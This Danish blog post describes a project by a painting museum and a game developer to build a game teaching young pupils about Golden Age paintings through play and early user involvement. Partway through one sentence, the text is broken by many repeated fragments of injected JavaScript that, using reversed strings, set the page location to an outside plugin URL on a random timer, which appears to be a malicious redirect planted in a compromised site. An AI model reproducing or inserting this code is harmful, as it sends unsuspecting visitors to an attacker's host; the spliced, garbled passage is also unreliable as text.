Fanget i Malerierne

Hvordan lærer man børn omkring begreber som det gyldnesnit, farvelære og stemningen i et maleri?
Hvordan kan guldaldermalerier blive interessante for børn i 3. – 5. klasse, når de i det daglige beskæftiger sig med et helt andet visuelt univers?
Det kunne ligne fagligt selvmord at stille sig selv en umulig opgave, for hvordan løser man ovenstående udfordringer?
Denne udfordring har Nivaagaards Malerisamling og spiludviklingsfirmaet GearWorks, i kraft af en bevilling fra Kulturarvsstyrelsen, sat sig sammen for at løse.

Vores vision er at lære børnene at SE ved hjælp af detaljerne. Vi vil ikke FORTÆLLE om begreberne men VISE det, ved at børnene LEGER med begreberne.

Kan man med udgangspunkt i de faglige erfaringer, som Nivaagards Malerisamling har, designe en spilmekanik der understøtter denne vision?
Dette vidste vi fra starten krævede flere kompetencer end dem vi kunne mønstre, nemlig dem der skulle bruge spillet i sidste ende; eleverne i 3. – 5. klasse og deres lærerer.

Spillet tager udgangspunkt i sytten malerier fra Nivaagaards Guldaldersamling og har fokus på at opdage og undersøge detaljen i de enkelte billeder, således at børnene bliver draget ind i billedernes univers og oplever dem på nye måder. I forbindelse med tilblivelsen af konceptet har vi arbejdet tæt sammen med børn fra Egedalsskolen og deres lærere. Et mål med projektet har været og er stadig at inddrage målgruppen i så mange faser af projektet så muligt. Formålet med projektet er at gøre børnene mere interesserede i periodens kunst, gennem et produkt og medie de kender til. Der har gennem de sidste år været talt meget om digitalisering af kulturarv og kulturformidling og samtidig er de digitale mediers indtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tog i folkeskolen ved for alvor at slå sig fast.

I bevillingen fra Kulturarvsstyrelsen er der også afsat midler til at lave erfaringsudveksling med både museumsformidlere og lærerresourcer. Denne udveksling af erfaringer vil forhåbentlig kunne give museumsformidlere en indsigt i, hvordan man gennem tidlig brugerinddragelse kan skabe et produkt, som børnene rent faktisk har lyst til at bruge. Vi har allerede i vores arbejde erfaret, at både lærere og elever ofte finder digitale læringsværktøjer meget fokuserede på den didaktiske del. Dette er selvfølgelig ikke dårligt, men det kan ofte resultere i at eleverne rent faktisk ikke synes produktet er specielt spændende at bruge. Vi har derfor, ved at inddrage børnene tidligt i processen, forsøgt at sikre at de også får et produkt, de synes er spændende.

På samme måde som projektet Digitale tråde over landskabet – Brugerinddragelse i udviklingen af app til smartphone også vil dele processen af projektet, vil vi også forsøge at dele de erfaringer vi har gjort os i løbet af designfasen, og hvilke erfaringer vi gør os med den videre udvikling og det tætte samarbejde med slutbrugerne af produktet. Vi har bl.a. oprettet en tumblr profil til at dele tanker, billeder og videoer.

Planen er, at der i løbet af de næste måneder skal afholdes et fyraftensmøde eller lignende omkring, hvordan man kan og, hvorfor man bør indrage slutbrugerne og især børn tidligt i processen. Vi håber at I på formidlingsnet.dk har lyst til også at dele jeres erfaringer af formidlingen til børn med os. Hvilke vanskeligheder kan der være? Hvad oplever I gør børnene interesserede? osv.
Vi vil i løbet af processen komme med konkrete eksempler på, hvordan vi tænker at man kan løse problematikken omkring formidling, børn, malerier og digitale medier.

Helt grundlæggende, hvordan sørger vi for at der bliver lavet nogle interessante tilbud til børn som formidler al den viden der er der ude til dem?

 

 

 

One comment to “Fanget i Malerierne”

Skriv et svar